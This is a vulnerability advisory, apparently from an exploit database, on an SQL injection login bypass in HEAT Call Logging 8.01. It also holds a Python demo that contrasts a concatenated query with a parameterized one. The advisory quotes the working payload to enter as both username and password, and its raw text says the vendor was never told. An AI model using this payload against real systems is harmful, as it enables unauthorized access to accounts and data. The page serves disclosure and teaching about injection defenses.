SQL Injection
Vendor: HEAT
By: antilimit
CVSS: 8.8 (HIGH)
CWE: 89
Product Name: HEAT
Affected Version From: 08.01
Affected Version To: 9
Patch Exists: Unknown
Related CWE: None
CPE: frontrange.com/heat.aspx
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None

HEAT Call Logging Version 8.01

HEAT Call Logging is vulnerable to SQL injection at login. An attacker can log in as the last logged-in user by supplying the following string as both the username and the password: ' OR HEATPass IS NOT NULL OR HEATPass = '

Mitigation:

Ensure that all user input is validated and sanitized before being used in a SQL query.
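
The login bypass described above, reproduced against a constructed SQLite table as an added example (not code from the advisory or from HEAT). The table name HEATUsers, the LoginID column and the query shape are assumptions; only the HEATPass column and the input string come from this page. It sets the concatenated query beside a parameterized one.

```python
import sqlite3

# String quoted in the advisory, supplied as both username and password.
PAYLOAD = "' OR HEATPass IS NOT NULL OR HEATPass = '"

def make_db():
    # Constructed sample data. HEATUsers and LoginID are assumed names; only
    # HEATPass appears in the advisory. Plain-text values keep the demo short.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE HEATUsers (LoginID TEXT PRIMARY KEY, HEATPass TEXT)")
    db.executemany("INSERT INTO HEATUsers VALUES (?, ?)",
                   [("alice", "pw-a"), ("bob", "pw-b"), ("o'neil", "pw-o")])
    return db

def login_concat(db, user, password):
    """Vulnerable pattern: input is pasted into the SQL text."""
    sql = ("SELECT LoginID FROM HEATUsers WHERE LoginID = '" + user +
           "' AND HEATPass = '" + password + "' ORDER BY LoginID")
    return [row[0] for row in db.execute(sql)]

def login_param(db, user, password):
    """Hardened pattern: input is bound as data and never parsed as SQL."""
    sql = ("SELECT LoginID FROM HEATUsers WHERE LoginID = ? AND HEATPass = ? "
           "ORDER BY LoginID")
    return [row[0] for row in db.execute(sql, (user, password))]

if __name__ == "__main__":
    db = make_db()
    # Quotes in the input close the literals, so the WHERE clause becomes
    # ... OR HEATPass IS NOT NULL OR ..., true for every row with a password.
    print("concat, payload:", login_concat(db, PAYLOAD, PAYLOAD))
    print("param,  payload:", login_param(db, PAYLOAD, PAYLOAD))
    # A legitimate name containing an apostrophe also breaks the concatenated query.
    try:
        login_concat(db, "o'neil", "pw-o")
    except sqlite3.OperationalError as exc:
        print("concat, o'neil: SQL error:", exc)
    print("param,  o'neil:", login_param(db, "o'neil", "pw-o"))
```

Every row matches the concatenated query here; which account a real application then selects depends on how it consumes the result, which the advisory does not describe.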

Exploit-DB raw data:

[=[ ;otokoyama; ]=]


-=[HEAT Call Logging Version 8.01]=-
"The HEAT family is a comprehensive service solution,
combining core technologies with a variety of expansion options,
so any enterprise can build a tailored solution."

-=[web]=-
http://www.frontrange.com/heat.aspx

-=[attack]=-
U:' OR HEATPass IS NOT NULL OR HEATPass = '
P:' OR HEATPass IS NOT NULL OR HEATPass = '

-=[Effect]=-
Logs in as last logged in user.
There would be many variations of the above, but who can be bothered.

-=[NOTICE]=-
Due to vendor and product distaste I have not informed them of this vuln.

I guess this is a 0-day then..

Via their webpage current version appears to be 9.0,
could apply to this version as well

SHOUTS:4chan for being shit, yes I will troll in a POC.


antilimit owns you